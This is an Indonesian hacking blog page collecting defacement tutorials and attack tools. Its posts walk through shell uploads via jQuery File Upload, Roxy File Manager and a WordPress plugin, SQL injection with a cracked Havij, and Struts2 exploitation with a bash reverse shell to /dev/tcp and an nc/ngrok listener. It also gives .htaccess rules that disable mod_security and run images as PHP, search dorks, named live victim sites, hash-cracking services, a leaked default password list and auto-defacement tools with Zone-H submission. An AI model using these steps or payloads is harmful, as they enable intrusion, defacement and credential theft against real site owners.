Codes Xploit: Exploit/Vulnerabilities
Showing posts with label Exploit/Vulnerabilities. Show all posts
Showing posts with label Exploit/Vulnerabilities. Show all posts

Cara Deface Jquery File Upload


assalamualaikum wr.wb
sore yang cerah untuk bikin post :'v ,kali ini gua bakal share POC
Jquery File Upload :'v
menurut gue ini cara deface yang paling mudah
tapi kita harus pande pande bypass ext shell nya :'v
ok kita lanjut ke tutorial

Bahan Bahan

-Shell ext :php.fla / php56 /php6 /php2 /php1 /.ndsfx / dll
-dork : Touch Me 
csrf onlen : Mpssh
exploit : http://target.com/[path]/server/php/
 itu aja :'v

Tutorial 

 yang pertama adalah kita dorking bisa lewat google image ato google biasa
klo dorking pake google image ya tinggal pencet images :'v di bawah kolom pencarian
contoh w dorking di google image :
Google Image















ciri ciri vuln ? seperti ini :'v Forbidden ? tinggalkan sadja :'v














ok lanjut ekse go to csrf nya :) trus isi url target
trus post filenya files [] contoh punya saya :
selanjut nya pencet lock target :'v abis itu upload shell klean trus pencet upload gan :'v


selanjutnya kita diredirect ke web tersebut lalu mendapatkan pesan sbb :

nah klo seperti itu berarti shell kita ter upload sekarang kita akses dengan menambahkan /files/namashell
contoh : www.kontok.com/server/php/files/w.php.fla











mudah kan ? masih kurang faham ? tenang ada vidionya kok

jangan lupa ya dilike fp nya :)

sekian terima kasih






 


Cara Deface Dengan SQLI (Havij)

kali ini gua mau share deface dengan sqli with Havij oke sebelumnya gua udah share tools havij ini
sekarang gua mau share cara makenya oke langsung aja

Bahan Bahan 

-Havij Crack nya (download disini gan)
-google dork : (download disini)
-Kesabaran :D

Tutorial 

kita Extrack Havij 1.16 dlu di tempat yang mudah dijangkau contoh Desktop
lalu klik kanan pada havij nya lalu Klik Run as admin












penampakan havij nya gini gan












oke selanjutnya kamu cari target dlu contoh saya ada live target
live : www.labooi.com/page.php?articles=17
exploit : site.com/contoh.php?id=69'
tambahin petik
oke Selanjutnya kita masukin ke havij nya tanpa tanda petik












lihat ss diatas, oke selanjut nya adalah kita klik analyze












kita tunggu ampe statusnya analyze ok selanjutnya adalah kita lihat tabel database nya
pencet tables












setelah itu klik get tables













ok selanjutnya adalah kita nyari column yang berhubungan dengan user admin pencet get columns
 contoh :
     user
     admin
     users
berhubung saya dapetnya web brazil so gue pilih table
engi_utillisateurs












terlihat banyak sangad datanya :'v selanjutnya kita centang apa saja yang digunakan untuk login lalu pencet get data
contoh
email , username , password ,id , dll *use your brain












tuh keliatan kan user dan pw admin
tapi klo masih bentuk md5 kita harus hash dlu
contoh di table password kek gini
fb889735bdeb0f8fc200aad392c6aafa745c9284
nah tinggal kita hash saja di hashkiller.co.uk
selanjutnya tinggal login deh
Add caption














tuh liat punya saya heheh masuk ke dashboard admin
btw klo mentok nyari admin loginnya make admin finder yang saya sudah share
upload shell ? use your brain :)
masih kurang paham ? nih vidionya

segitu aja dari gua :) jangan lupa like fp kami ya ^_^

Wordpress Plugins Mobile Detector Shell Upload



yo :'v dah lama gk ngepos ea ainx gk ada imajinasi buat share tutor :'v
nyari exploit baru di exploit-db nemu juga okwowkowk
langsung aja

Bahan : 

dork : inurl:"/wp-content/plugins/wp-mobile-detector/"
          *kembangkan
bekas defacean kalian
oke langsung ke TKP

TKP

1. Dorking di google :'v pilih satu gan jangan semua :'v
2.nah klo sudah exploit dengan
wp-content/plugins/wp-mobile-detector/resize.php
contoh:http://site.com/wp-content/plugins/wp-mobile-detector/resize.php
3.abis itu kita anuin resize.php nya
contoh :http://site.com/wp-content/plugins/wp-mobile-detector/resize.php?src=site.com/deface.php
*site.com/deface.php nya ganti sama bekas defacean kalian
4.nah klo udah akses deh ^_^
akses ? http://site.com/wp-content/plugins/wp-mobile-detector/cache/shell.php

Demo

http://www.alrashidschool.com/ischool/wp-content/plugins/wp-mobile-detector/cache/h3.html
Kurang Paham ? vidio nya

Cara Deface Roxy File Manager

yu wazzap gaes >:( kali ini gue mao share cara deface dengan Roxy File Manager
yaudah berhubung udah malem yaudah deh langsung aja >:(

dork: intitle:"Roxy File Manager"
         inurl:fileman/uploads/
*kembangkan
ext shell : .php56 .php.fla, .php.xxx , .php5 .php6, .php.xxxjpg , .php.orion , .php.h3ll dll
pertama klean dorking di google :) trus cari target klean
nah abis itu exploit dengan
site.com/path/fileman/index.html <- kurang lebih seperti itu :'v
Live Target ainx : http://canhogiaresaigon.com.vn/quanly/fileman/index.html












abis itu upload shell kalean
Foto saat upload shell














nah klo kek gitu bisa gan sekarang tinggal akses deh
akses ? site.com/path/filemanager/Uploads/shell.php.fla












heheheheheheheheeh mudah kan ? Tinggal tebas aja tuh kwowkowkokwowkokw
oh iya jan lupa Like fp kita ya hehehehehe

Download Havij 1.16 pro Portable Crack

yup :'v kali ini gua mau share tools andalan gua klo maen sqli yaitu Havij :'v
ya sedikit penjelesan tentang havij ini
havij adalah sebuah alat untuk melakukan penetrasi terhadap wesite yang mempunyai vulnerability di
Sql Injection :'v













ini tools karena namanya crack jadi otomatis udah full fiture :'v 
ok deh langsung aja ke link donlodnya :'v 

Download Gan

Lapor Klo link rusak ok ;)

Tutorial Back Connect without port forwading

 yo apa kabar klean hehehehe ;'v
disini w mao bagi bagi tutor neh backconnect di shell :'v
ok langsung aja
pertama kalian download ngrok sama netcatnya 
kucing warnetnya : disni
https://ngrok.com/ daftar trus download
klo udah daftar :''v tinggal login abis login kita dialihkan ke dasboard member
nah disini terlihat ada auth token kita copy auth tokennya trus paste ke ngrok 

FAC!














klo udah install auth token kita ketikkan 

ngrok.exe tcp 123         
FAC2














nah klo udah kayak gitu buka netcat nya
ketikkan nc -lnvp 123
FAC3












kita ke shell 













kurang lebih seperti ss :'v
isi servernya
0.tcp.ngrok.io portnya:random number
kan 0.tcp.ngrok.io:randomport

FAC4













sukses tinggal kau root 

Tutorial Remote Code Exploit (Apache Struts2)

Cara Deface Dengan Apache Sruts2 ( Remote Code Execution)

yo apa kabar gaes :''v gue admin baru nih hehehe kali ini gue bakal share tutor tentang 
Apache struts2 Remote Code Execution
sedikit info tentang Remote Code Execution ini Remote Code execution adalah sebuah vulnrability yang memungkinkan si attacker untuk memberikan code code berbahaya seperti namanya Remote Code kita bisa meremote kode kode tersebut lalu mengirimnya ke web target 
yodah gk usah banyak cocot lagi :'v 
Yup Langsung saja
Bahan : 
Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Python <- disini gaes 
jexboss <- disini gaes 
netcat <-  disini gaes 

Langsung Ke tutor

1.Buka CMD lalu ke folder jexboss nya

2.yang ke dua ketikkan 
python jexboss.py -u http://targetklean.com 
klo vuln ada bacaan vulnerable trus ketik yes


3.sekarang kita coba reverse shell
Buka Netcat nya trus ketikkan
nc -lnvp 123















habis itu ke jexbossnya yang berhasil kita exploit
4.ketikkan /bin/bash -i > /dev/tcp/ip/port 0>&1 2>&1\n
note: klo port mu blom di forward coba pakai ngrok















Klo port blom di forward cek tutor disini gaes Tutorial back conect with Ngrok (disni)

Done udah kita berhasil reverse shell tinggal di anuin

Vidionya Gaes : disini gaes 

klo hoki sih bisa di root :''v

Tool Untuk Memudahkan Deface , Pybelt

Tool Hacker Belt Pybelt

Tool Untuk Memudahkan Deface ,  Pybelt 

Jika kalian ingin melalukan peretasan mending gunakan Tools ini :) , mari kita Perkenalkan Tools Pybelt.
Pybelt adalah alat memudahkan peretas yang berbasis Python yang mampu memecahkan hash tanpa pengetahuan sebelumnya tentang algoritma, memindai port pada host tertentu, mencari kerentanan SQLi di URL yang diberikan, Mencari Website Dengan Google Dorks tanpa verikasi google, memverifikasi algoritme dari Hash yang diberikan, memindai URL untuk kerentanan XSS, dan menemukan proxy HTTP yang dapat digunakan.
Fitur - Fitur : 
  • Port Scanner
  • SQL Injection scanner
  • Dork Checker
  • Hash Cracker
  • Hash Type Verification
  • Proxy Finder
  • XSS Scanner
Untuk Melanjutkan Tahap Installan kalian install dahulu Python silahkan download di google ya :)
sekarang Download Dahulu Tool Nya :)


Ekstrak di Local disk C:\ biar mudah :) , dan ubah nama folder tersebut menjadi install ( bebas sih ganti nama aja biar mudah gw pake nama install ) lalu buka cmd dan ketik cd C:\install atau cd C:\ lalu cd install :)
Abis itu masukkan ini di cmd -> pip install -r requirements.txt
Lihat gambar biar ngerti ea 

SS1

Tunggu ampe selesai installan , jika selesai akan seperti ini :)

SS2

Selesai deh :) untuk gunakan Fitur lihat di bawah :
  • python pybelt.py -p 127.0.0.1 Scan Port pada host local
  • python pybelt.py -s http://example.com/php?id=2 Scan SQL 
  • python pybelt.py -d idea?id=55 Dork Scanner
  • python pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all Memecahkan hash menggunakan semua algoritma yang ada di komputer. 
  • python pybelt.py -v 098f6bcd4621d373cade4e832627b4f6 Mencari Verikasi Jenis HASH Seperti MD5
  • python pybelt.py -f Menemukan Proxy yang bisa di gunakan
  • python pybelt.py -x http://127.0.0.1/php?id=1 Mencari Isi Website untuk Kerengtanan XSS
Sekian dan Terimah kasih silahkan Like Fanspage kami biar makin Enjoy :) 

Kumpulan Code Untuk Bypass .Htaccess

Kumpulan Code Untuk Bypass .Htaccess

Kumpulan Code Untuk Bypass .Htaccess

Bete kagak Ngeblog rasa gimana gitu, yah meskipun sedang cuti team wkwkwkkwk :'v

Bypass mod security :

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Bypass symlink :

Options All
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
AddType text/html php

Atau Bisa juga :


OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

Bypass safe mode :

Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini

Bypass 400


Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

RUN SSI


AddType text/html .shtml
AddOutputFilter INCLUDES .shtml

RUN JPG KE PHP


AddHandler application/x-httpd-php .jpg .php

Sekian dari gw , Lanjutkan Ilmu mu ya wkwkkwkwk :'v

Kumpulan Type-Type Hash & Enkripsi Lengkap!

Kumpulan Type-Type Hash & Enkripsi Lengkap!


Biasanya pasti bingung kan jika menemukan password & tidak tahu ? ya ini biasanya yang lagi main SQLI , Lokmed , dll :v , Hash sama dengan kaitannya dengan Enkripsi (decrypt). Nah apakah arti hash itu sendiri ? Hash adalah hasil enkripsi dari sebuah password atau informasi yang dianggap penting. Sedangkan Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus. Oke mari kita lanjutt :)

DES (Unix)
Contoh: IvS7aeT4NzQPM
Digunakan di Linux dan OS lain yang sejenis.
Panjang: 13 karakter.
Keterangan: Dua karakter pertama adalah garam (karakter acak, dalam contoh kita garam adalah string "Iv"), maka ada mengikuti hash yang sebenarnya.


Domain Cached Credentials
Contoh: Admin: b474d48cdfc4974d86ef4d24904cdd91
Digunakan untuk caching password dari domain Windows.
Panjang: 16 bytes.
Algoritma: MD4 (. MD4 (Unicode ($ pass)) Unicode (strtolower ($ username)))


MD5 (Unix)
Contoh: $ 1 $ 12.345.678 $ XM4P3PrKBgKNnTaqG9P0T /
Digunakan di Linux dan OS lain yang sejenis.
Panjang: 34 karakter.
Keterangan: Hash dimulai dengan $ 1 $ signature, maka hilanglah garam (hingga 8 karakter acak, dalam contoh kita garam adalah string "12345678"), maka hilanglah satu $ karakter lebih, diikuti oleh hash yang sebenarnya.
Algoritma: Sebenarnya yang loop memanggil algoritma MD5 2000 kali.


MD5 (APR)
Contoh: $ apr1 $ 12.345.678 $ auQSX8Mvzt.tdBi4y6Xgj.
Digunakan di Linux dan OS lain yang sejenis.
Panjang: 37 karakter.
Keterangan: Hash dimulai dengan $ apr1 $ signature, maka hilanglah garam (hingga 8 karakter acak, dalam contoh kita garam adalah string "12345678"), maka hilanglah satu lagi $ karakter, diikuti oleh hash yang sebenarnya .
Algoritma: Sebenarnya yang loop memanggil algoritma MD5 2000 kali.

MD5 (phpBB3)
Contoh: $ H $ 9123456785DAERgALpsri.D9z3ht120
Digunakan di phpBB 3.x.x.
Panjang: 34 karakter.
Keterangan: Hash dimulai dengan $ signature $ H, maka hilanglah satu karakter (paling sering jumlah '9'), maka hilanglah garam (8 karakter acak, dalam contoh kita garam adalah string "12345678"), diikuti oleh hash yang sebenarnya.
Algoritma: Sebenarnya yang loop memanggil algoritma MD5 2048 kali.

MD5 (Wordpress)
Contoh: $ P $ B123456780BhGFYSlUqGyE6ErKErL01
Digunakan di Wordpress.
Panjang: 34 karakter.
Keterangan: Hash dimulai dengan $ P $ signature, maka hilanglah satu karakter (paling sering jumlah 'B'), maka hilanglah garam (8 karakter acak, dalam contoh kita garam adalah string "12345678"), diikuti oleh hash yang sebenarnya.
Algoritma: Sebenarnya yang loop memanggil algoritma MD5 8192 kali.

MySQL
Contoh: 606717496665bcba
Digunakan dalam versi lama MySQL.
Panjang: 8 byte.
Keterangan: hash ini terdiri dari dua DWORDs, masing-masing tidak melebihi nilai 0x7fffffff.

MySQL5
Contoh: * E6CC90B878B948C35E92B003C792C46C58C4AF40
Digunakan dalam versi baru dari MySQL.
Panjang: 20 bytes.
Algoritma: SHA-1 (SHA-1 ($ pass))
Catatan: hash yang akan dimuat ke program tanpa tanda bintang yang berdiri di setiap awal hash.

RAdmin v2.x
Contoh: 5e32cceaafed5cc80866737dfb212d7f
Digunakan dalam aplikasi Remote Administrator v2.x.
Panjang: 16 bytes.
Algoritma: Sandi empuk dengan nol dengan panjang 100 byte, maka seluruh string hash dengan algoritma MD5.

MD5
Contoh: c4ca4238a0b923820dcc509a6f75849b
Digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan banyak forum lain dan CMS.
Panjang: 16 bytes.
Algoritma: Sama seperti fungsi md5 () di PHP.

md5 ($ lulus. $ salt)
Contoh: 6f04f0d75f6870858bae14ac0b6d9f73: 1234
Digunakan di WB News, Joomla versi 1.0.13 dan yang lebih tinggi.
Panjang: 16 bytes.

md5 ($ garam. $ pass)
Contoh: f190ce9ac8445d249747cab7be43f7d5: 12
Digunakan di osCommerce, AEF, Gallery dan CMS lainnya.
Panjang: 16 bytes.

md5 (md5 ($ pass))
Contoh: 28c8edde3d61a0411511d3b1866f0636
Digunakan di e107, DLE, AVE, Diferior, Koobi dan CMS lainnya.
Panjang: 16 bytes.

md5 (md5 ($ pass). $ salt)
Contoh: 6011527690eddca23580955c216b1fd2: wQ6
Digunakan di vBulletin, IceBB.
Panjang: 16 bytes.

md5 (md5 ($ garam) md5 ($ pass))
Contoh: 81f87275dd805aa018df8befe09fe9f8: wH6_S
Digunakan di IPB.
Panjang: 16 bytes.

md5 (md5 ($ garam). $ pass)
Contoh: 816a14db44578f516cbaef25bd8d8296: 1234
Digunakan di MyBB.
Panjang: 16 bytes.

md5 ($ garam. $ lulus. $ salt)
Contoh: a3bc9e11fddf4fef4deea11e33668eab: 1234
Digunakan di TBDev.
Panjang: 16 bytes.

md5 ($ salt.md5 ($ garam. $ pass))
Contoh: 1d715e52285e5a6b546e442792652c8a: 1234
Digunakan di DLP.
Panjang: 16 bytes.

SHA-1
Contoh: 356a192b7913b04c54574d18c28d46e6395428ab
Digunakan di banyak forum dan CMS.
Panjang: 20 bytes.
Algoritma: Sama seperti fungsi sha1 () di PHP.

sha1 (strtolower ($ username). $ pass)
Contoh: Admin: 6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Digunakan di SMF.
Panjang: 20 bytes.

sha1 ($ salt.sha1 ($ salt.sha1 ($ pass)))
Contoh: cd37bfbf68d198d11d39a67158c0c9cddf34573b: 1234
Digunakan di Woltlab BB.
Panjang: 20 bytes.

SHA-256 (Unix)
Contoh: $ 5 $ 12.345.678 $ jBWLgeYZbSvREnuBr5s3gp13vqi
Digunakan di Linux dan OS lain yang sejenis.
Panjang: 55 karakter.
Keterangan: Hash dimulai dengan $ 5 $ signature, maka hilanglah garam (hingga 8 karakter acak, dalam contoh kita garam adalah string "12345678"), maka hilanglah satu $ karakter lebih, diikuti oleh hash yang sebenarnya.
Algoritma: Sebenarnya yang loop memanggil algoritma SHA-256 5000 kali.

SHA-512 (Unix)
Contoh: $ 6 $ 12.345.678 $ U6Yv5E1lWn6mEESzKen42o6rbEm
Digunakan di Linux dan OS lain yang sejenis.
Panjang: 98 karakter.
Keterangan: Hash dimulai dengan $ 6 $ signature, maka hilanglah garam (hingga 8 karakter acak, dalam contoh kita garam adalah string "12345678"), maka hilanglah satu $ karakter lebih, diikuti oleh hash yang sebenarnya.
Algoritma: Sebenarnya yang loop memanggil algoritma SHA-512 5000 kali.

Base64
Contoh: Y3liZXJfY3JpbWluYWw=
Digunakan di : Beberapa Forums CMS
Panjang: 20 karakter.
Algoritma: Berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan �=�

Tempat untuk Crach Hash Password :
http://hashkiller.co.uk/
http://md5online.com/
http://base64decode.net/ (Base64)
crackstation.net
Sekian dari w Mohon Maaf jika ada salah kata :) yaa,.,,,,
Join Grub kami untuk belajar bersama sama :) : Family Attack Cyber

Default Password List � 2017 (VoIP)


Default Password List � 2017 (VoIP)

Pengertian Voice over Internet Protocol (VoIP) adalah teknologi yang mampu mengirimkan data suara, video dan data yang berbentuk paket secara realtime dengan jaringan yang menggunakan Internet Protocol (IP).
Dengin ini gw akan share default daftar perankat VoIP dengan nama vendor , user & password :

Default Password List � 2017 (VoIP)

Default Password List � 2017 (VoIP)
 Sumber ? Leaked :)

DAVScan , Webdav Security Scanner


DAVScan adalah cepat dan ringan WebDAV scanner yang dirancang untuk menemukan file dan folder tersembunyi pada webservers DAV diaktifkan. scanner bekerja dengan mengambil keuntungan dari terlalu istimewa / server WebDAV terkonfigurasi atau server rentan terhadap berbagai pengungkapan atau otentikasi memotong kerentanan. Pemindai mencoba untuk sidik jari server target dan kemudian laba-laba
server berdasarkan hasil dari permintaan akar PROPFIND.

Fitur :
  • Server sundulan fingerprinting - Jika webserver mengembalikan server header, davscan dapat mencari eksploitasi publik berdasarkan respon. 
  • Dasar DAV scanning dengan PROPFIND - Quick scan untuk menemukan sesuatu yang mungkin terlihat dari DAV. 
  • Unicode Tupoksi Bypass - Bekerja menggunakan GET belum menambahkan PROPFIND belum. Tidak sepenuhnya diuji sehingga periksa pekerjaan. 
  • Pengecualian dari DoS mengeksploitasi hasil - Anda dapat mengecualikan penolakan eksploitasi layanan dari hasil searchsploit
  • Pengecualian dari modul MSF dari mengeksploitasi hasil - Kustom searchsploit termasuk dalam repo untuk ini. Entah menimpa searchsploit atau cadangan yang ada dan mengganti. Fitur ini mungkin atau mungkin tidak berakhir dalam naskah searchsploit nyata.
Download Here
Thx Sudah membaca Artikel ini Semoga bermanfaat. mohon maaf jika ada salah kata :)
Family Attack Cyber ,  DAVScan , Webdav Security Scanner , Exploit Webdav , Webdav Auto Deface , Exploit Webdav Hmei7 , Hmei7 Tools

Cara mendapatkan Dollar dengan mudah!!! (NoScam)

Tips 100% Aman Mendapatkan uang Dengan Cepat !
Pastinya kalian butuh Uang kan ? ya sama kaya saya hahahhaha :) Ok mari kita lanjut :)
langsung saja klik Link ini -> Click Here
  • Silahkan Daftar Dahulu
  • Jika Sudah nanti akan ada konfirmasi gmail di gmail kalian
  • Nah abis itu untuk mendapatkan uang ? kalian selesai kan misi yang akan di berikan atau Share Refferral kalian :)
  • Untuk penukaran silahkan Klik Prize

    dalam ini kalian bisa pilih Hadiah Gadgets , Electronik dan Gift Card
    Untuk mendapatkan uang di paypal kalian klik Gift Card dan pilih paypal kalian boleh pilih mana aja
    terimah kasih sudah baca :) 
    Cara mendapatkan Dollar dengan mudah!!! (NoScam)

    Bug Untuk IOS Mencapai $ 500.000 untuk Exploits

    Tampaknya tahun ini bug semakin benar-benar serius, terutama di pasar sekunder melibatkan mengeksploitasi perusahaan perdagangan, tidak langsung ke produsen software atau pemilik.

    Bug Untuk IOS Mencapai $ 500.000 untuk Exploits
     $ 500.000 tidak bodoh perubahan dan akan menjadi tahun yang baik untuk tim keamanan kecil, terutama yang tinggal di suatu tempat dengan mata uang lemah. Bahkan untuk seorang peneliti keamanan solo di AS atau Eropa itu segepok uang tunai yang serius.

    Chrome tidak terlalu jauh di belakang baik dengan $ 150.000 pembayaran yang tersedia.


    Pekan lalu Apple membuat pintu masuk terlambat ke pasar bug karunia, mengumumkan penghargaan atas $ 200.000 untuk cacat besar dalam iOS, tetapi Cook & Co telah secara komprehensif dlm.

         Pada hari Selasa, mengeksploitasi perusahaan perdagangan Exodus Intelligence mengatakan bersedia membayar $ 500.000 untuk cacat besar dalam iOS 9.3 dan di atas - dan mengeksploitasi untuk menggunakannya. Para peneliti baik dapat mengambil lump sum atau menerima jumlah yang lebih kecil dan pembayaran kuartalan sampai mengeksploitasi ditemukan, yang pendiri perusahaan kepada The Reg bisa menambahkan hingga lebih.

         "Mayoritas klien kami adalah vendor defensif, penguji penetrasi, dan merah tim / biru," kata Logan Brown, presiden Exodus.

         Apel eksploitasi mendapatkan penghargaan tertinggi, mencerminkan kelangkaan mereka. Microsoft dan Google program bug bounty juga perlu sampai imbalan mereka untuk mencocokkan harga Exodus ini.

         Sehari nol di Google Chrome akan mendapatkan maksimal $ 150.000, 50 persen lebih dari uang pembayaran tertinggi Chocolate Factory.

    Sepertinya perangkat Apple masih merupakan hal yang panas untuk pergi setelah dengan kurangnya serius eksploitasi tersedia untuk versi iOS baru. Bahkan Apel sendiri menawarkan $ 200.000

    Untuk mendapatkan pembayaran maksimum dari Apple Anda harus memberikan cacat dalam firmware boot aman yang jadi jengkel FBI, sementara celah yang dapat mengekstrak data rahasia yang dilindungi oleh telepon atau prosesor kantong aman tablet (September) akan menghasilkan hadiah sampai $ 100.000.
     

     Sementara itu, menemukan cacat serius di browser Ujung Redmond ini bernilai $ 125.000 Exodus, jauh melebihi $ 500 dan $ 1.500 saat ini ditawarkan oleh Microsoft. Ada juga $ 75.000 untuk diperebutkan jika Anda dapat menumbangkan hak lokal di Windows 10 dan menunjukkan bagaimana hal itu dilakukan.

         Keluaran mengatakan itu senang untuk membayar karunia ini di cek, transfer kawat, Western Union, atau Bitcoin.

         Namun demikian, ini adalah persis jenis perang penawaran yang perusahaan perangkat lunak besar tidak ingin melihat ketika mereka mulai melakukan karunia bug. Awalnya harga untuk kerentanan yang ditetapkan rendah, tetapi meningkat untuk memenuhi harga pasar. Sekarang peneliti keamanan mampu membuat kehidupan yang layak berlatih kerajinan mereka.

    Seperti yang Anda lihat, Exodus menawarkan banyak sekali lebih dari para pedagang sendiri dengan cacat di Ujung pergi untuk $ 125.000 dengan Microsoft hanya menawarkan sangat sedikit $ 1.500.

    Ini bukan apa yang vendor perangkat lunak ingin, tapi itu apa yang masyarakat perlu untuk mengekspos kelemahan serius - mereka harus batuk dan harga pasar menangkap meskipun. Jika tidak eksploitasi mungkin berakhir dengan pemerintah yang mungkin tidak harus memiliki mereka.


    INURLBR - Advanced Alat Search Engine



    INURLBR adalah berdasarkan alat mesin pencari canggih PHP untuk profesional keamanan, mendukung 24 mesin pencari dan 6 web atau khusus dalam pilihan. Sangat berguna untuk tahap pengumpulan informasi dari uji penetrasi atau penilaian kerentanan.

    Alat ini berfungsi dalam banyak cara yang memungkinkan Anda untuk memanfaatkan kekuatan apa yang sudah diindeks oleh mesin pencari dan menganalisis target Anda untuk eksploitasi potensi, capture E-mail dan URL dengan validasi internal kustom untuk setiap target / URL ditemukan.

    Juga mendukung perintah eksternal untuk eksploitasi, jadi jika Anda scan / pencari menemukan potensi divalidasi kerentanan SQL Injection, Anda bisa memiliki INURLBR langsung meluncurkan sqlmap atau alat pilihan Anda.



    Features : 

    • Generate IP ranges or random_ip and analyse the targets.
    • Customization of HTTP-HEADER, USER-AGET, URL-REFERENCE.
    • Execute external commands to exploit certain targets.
    • Generate random dorks or set dorks file.
    • Option to set proxy manually or from a file list.
    • Supports both SOCKS and HTTP proxies
    • Set time for proxy change when using random.
    • Supports TOR to randomise IP.
    • Debug processed URLs & HTTP requests.
    • Can send vulnerable URLs to an IRC chat room.
    • Support for GET / POST => SQLI, LFI, LFD injection exploits.
    • Filter and validate based on regexp.
    • Extraction of e-mail addresses and URLs.
    • Validation using HTTP response codes.
    • Search pages based on strings file.
    • Exploits commands manager.
    • Paging limiter on search engines.
    • Beep sound when a vulnerability is found.
    • Use text file as a data source for URLs to test.
    • Find personalized strings in return values of the tests.
    • Checks and validates for ShellShock
    • File validation for the WordPress config file � wp-config.php.
    • Can execute a sub-process for validation.
    • Validate syntax errors for databases and programming.
    • Data encryption as native parameter.
    • Random Google host.
    • Scan port.

    Mesin Mencari yang Support :

    • Google / (CSE) generic random / API
    • Bing
    • Yahoo! BR
    • Ask
    • HAO123 Br
    • Google (API)
    • Lycos
    • UOL Br
    • Yahoo! US
    • Sapo
    • Dmoz
    • Gigablast
    • Never
    • Baidu BR
    • Andex
    • Zoo
    • Hotbot
    • Zhongsou
    • Hksearch
    • Ezilion
    • Sogou
    • DuckDuckGo
    • Boorow
    • Google (CSE) generic random
    Special :
    • Tor Find
    • Elephant
    • Torsearch
    • Wikileaks
    • OTN
    • Shodan 

    Errors Yang di Check untuk : 

    • Java Infinitydb
    • LFI
    • Zimbra mail
    • Zend framework
    • MariaDB
    • MySQL
    • Jbossweb
    • Microsoft
    • ODBC
    • PostgreSQL
    • PHP
    • WordPress
    • Web Shell
    • JDBC
    • ASP
    • Oracle
    • DB2
    • CFM
    • LUA
    Jika kalian ingin Mendownload Silahkan Klik Tombol -> Here Download !
    Terimah kasih sudah membaca tolong di share postingan ini jika bermanfaat buat kalian :D
     

     

    (Update) Mencari Celah Admin Finder V3

    (Update) Mencari Celah Admin Finder V3

    Hallo :)
    sekarang jarang on, saat tidak on sempat" update nich aplikasi :)
    beberapa udh pasang wordlistnya sampat 101 wordlist yaitu setengah indo dan luar negeri :v
    langsung aja kita comot :)
    Download Here!!!

    (Update) Mencari Celah Admin Finder V3

    0Day Exploit Shell Finder

    0Day Exploit Shell Finder
    Tools ini berfungsi jika lo Gk tau tempat shell lo dan ini cocok untuk tikung shell orang :D what ? yes ini masih uji coba nanti gw fix yang error :D.

    Klik di sini untuk Mendownload :D

    Thx You Sudah membaca Tools ini :D

    Wordpress 0Day Exploiter


    Deface Wordpress 0Day Exploiter
    Software untuk Deface Website Wordpress :). Kok ada 0Day Exploit ? itu ente korban film Who Am I :v
    Cara Menggunakan Pun Simple Nanti Akan ada Dork di dalam nya :) untuk mendownload silahkan Klik di bawah ini atau di samping ini :v -> Download Here :)
    • Target ? Target You Yang Dorking :)
    • Theme ? Yah ente pake Dork apa jika akhiran Theme  averin yah averin :)
    • Gmail ? Gmail Your Gunakan Gmail Fake Generator :) cek Google :)
    Jika Bingung cek Youtube aja :). Thx Sudah baca & Share For Me. Jika mau Donasi ke kami silahkan klik kanan tombol Donasi :) Thx

    (Fixed) Auto Exploiter Elfinder Upload Shell + Auto Submit Zone-H By M Daffa N

    Ok Kali ini gw share hasil coding gw perl :v Deface teknik ini sih gw bikin yg buat belajar Yg blm bisa deface aja :) langsung aja download file :)
    Download File -> Download here :v
    • Buat List target dulu kumpulin di file txt
    • kumpulkan sebanyak mungkin
    • extrak file nya , copy semua ke locak disk c , copy list
    • ubah file auto exploiter bla bla ke yg simple kaya x.pl
    • penggunaan cd.. C:\ -> perl x.pl list.txt
    • tunggu -> Done
    Dalam Teknik ini Auto Submit Zone-H Sama Auto Deface liat file deface tambahkan -> bl4ckb3k4si.html
    Thx you :v klo submit zone-h use your brain :)